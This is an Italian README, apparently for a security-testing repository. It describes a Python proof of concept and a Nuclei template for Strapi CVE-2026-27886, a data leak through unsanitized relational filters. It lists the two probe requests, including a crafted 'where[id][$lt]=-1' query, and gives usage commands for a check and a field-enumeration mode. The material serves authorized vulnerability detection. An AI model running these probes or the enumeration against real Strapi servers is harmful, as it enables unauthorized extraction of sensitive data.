
Strapi CVE-2026-27886. Fuga di dati sensibili tramite filtraggio relazionale a causa della mancanza di sanitizzazione delle query.
Solo per test di sicurezza autorizzati.
Include:
CVE-2026-27886.py - PoC PythonCVE-2026-27886.yaml - template Nuclei per il rilevamentoIl checker invia due richieste a un endpoint pubblico di una collection dell'API Content di Strapi:
GET /api/<collection>
GET /api/<collection>?where[id][$lt]=-1
Se la risposta di base contiene record e il falso predicato where riduce il set di risultati a zero, l'endpoint è probabilmente vulnerabile.
Controllo sicuro:
python3 CVE-2026-27886.py http://strapi/api/articles
Enumerazione dei campi:
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles